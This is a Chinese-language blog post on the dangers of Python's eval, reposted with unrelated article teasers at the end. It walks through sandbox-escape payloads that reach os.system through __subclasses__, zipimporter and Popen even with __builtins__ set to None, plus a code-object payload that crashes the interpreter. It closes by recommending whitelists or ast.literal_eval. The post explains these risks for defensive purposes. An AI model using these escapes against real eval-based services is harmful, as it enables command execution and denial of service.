摘要:但如果对用户的请求处理不恰当,就会造成严重的安全漏洞。经过测试,的构造函数是被解释器沙箱隔离的。构造完成后,调用函数即可触发,其思路不可谓不淫荡。
eval前言
In [1]: eval("2+3") Out[1]: 5 In [2]: eval("[x for x in range(9)]") Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]
当内存中的内置模块含有os的话,eval同样可以做到命令执行:
In [3]: import os In [4]: eval("os.system("whoami")") hy-201707271917administrator Out[4]: 0
当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:
In [8]: eval("__import__("os").system("whoami")") hy-201707271917administrator Out[8]: 0
在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞。
安全”使用eval
现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:
Eval函数的声明为eval(expression[, globals[, locals]])
其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。
>>> import os >>> "os" in globals() True >>> eval("os.system("whoami")") win-20140812chjadministrator 0 >>> eval("os.system("whoami")",{},{}) Traceback (most recent call last): File "", line 1, in File "", line 1, in NameError: name "os" is not defined
如果指定只允许调用abs函数,可以使用下面的写法:
>>> eval("abs(-20)",{"abs":abs},{"abs":abs}) 20 >>> eval("os.system("whoami")",{"abs":abs},{"abs":abs}) Traceback (most recent call last): File "", line 1, in File "", line 1, in NameError: name "os" is not defined >>> eval("os.system("whoami")") win-20140812chjadministrator 0
使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!
绕过执行代码1
被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:
env = {} env["locals"] = None env["globals"] = None env["__name__"] = None env["__file__"] = None env["__builtins__"] = None eval(users_str, env)
Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:
>>> __builtins__.abs(-20) 20 >>> abs(-20) 20
我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:
>>> def hello(): ... print "shabi" >>> __builtin__.__dict__["say_hello"] = hello >>> say_hello() shabi
小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:
>>> id(__builtins__) 3549136 >>> id(__builtin__) 3549136
根据乌云drops提到的方法,使用如下代码即可:
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
上面的代码首先利用__class__和__subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:
>>> "os" in configobj.__dict__ True >>> import urllib >>> "os" in urllib.__dict__ True >>> import urllib2 >>> "os" in urllib2.__dict__ True >>> configobj.os.system("whoami") win-20140812chjadministrator 0
和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:
from setuptools import setup, find_packages
然后执行:
python setup.py bdist_egg
就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:
>>> env = {} >>> env["locals"] = None >>> env["globals"] = None >>> env["__name__"] = None >>> env["__file__"] = None >>> env["__builtins__"] = None >>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("E:/internships/configobj-5.0.5-py2.7.egg").load_module("configobj").os.system("whoami")" >>> eval(users_str, env) win-20140812chjadministrator 0 >>> eval(users_str, {}, {}) win-20140812chjadministrator 0
拒绝服务攻击1
object的子类中有很多有趣的东西,执行以下代码查看:
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,Quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类Quitter进行退出:
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "Quitter"][0](0)()", {"__builtins__":None})
C:/>
如果运气好,遇到对方程序中导入了os等敏感模块,那么Popen就可以用,并且绕过__builins__为空的限制,例子如下:
>>> import subprocess >>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "Popen"][0](["ping","-n","1","127.0.0.1"])",{"__builtins__":None}) >>> 正在 Ping 127.0.0.1 具有 32 字节的数据: 来自 127.0.0.1 的回复: 字节=32 时间>>
事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用。
拒绝服务攻击2
同样,我们甚至可以绕过__builtins__为None,造成一次拒绝服务攻击,Payload(来自老外blog)如下:
>>> eval("(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()", {"__builtins__":None})
运行上面的代码,Python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是KABOOM,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫荡。
总结
从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval。
参考资料:
【1】http://nedbatchelder.com/blog...
【2】http://drops.wooyun.org/web/7490
【3】http://stackoverflow.com/ques...
【4】http://www.chenxm.cc/post/329...
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/40908.html
摘要:内置函数们能够被提拔出来,这就意味着它们皆有独到之处,有用武之地。因此,掌握内置函数的用法,就成了我们应该点亮的技能。报错包含了内置命名空间中的名称,在控制台中输入,就能发现很多内置函数异常和其它属性的名称。 Python 提供了很多内置的工具函数(Built-in Functions),在最新的 Python 3 官方文档中,它列出了 69 个。 大部分函数是我们经常使用的,例如 p...
摘要:因为道格拉斯的大多数作品并没有注明日期,所以,我不确定他是否是在年创造了这个术语。但这并不能说明是魔鬼,这只是开发工作流程中的一点问题。中间人攻击被认为是的永远存在的危险,会受到蠕虫的的攻击。 原文来自:https://www.nczonline.net/blog/2013/06/25/eval-isnt-evil-just-misunderstood/ 作者:Nicholas C.Z...
摘要:例如,整数浮点数字符串等基本类型,就是字面量。所以,取出的字符串内容,并不能直接用作变量名,需要另想办法。总结抽象一下最初的问题,它实际问的是如何将字符串内容作为其它对象的变量名,更进一步地讲是如何将常量转化为变量。 前几天,我们Python猫交流学习群 里的 M 同学提了个问题。这个问题挺有意思,经初次讨论,我们认为它无解。 然而,我认为它很有价值,应该继续思考怎么解决,所以就在私密...
阅读 643·2021-11-24 09:39
阅读 3487·2019-08-30 15:53
阅读 2525·2019-08-30 15:44
阅读 3245·2019-08-30 12:54
阅读 2214·2019-08-29 12:23
阅读 3310·2019-08-26 14:05
阅读 2112·2019-08-26 13:36
阅读 3443·2019-08-26 13:33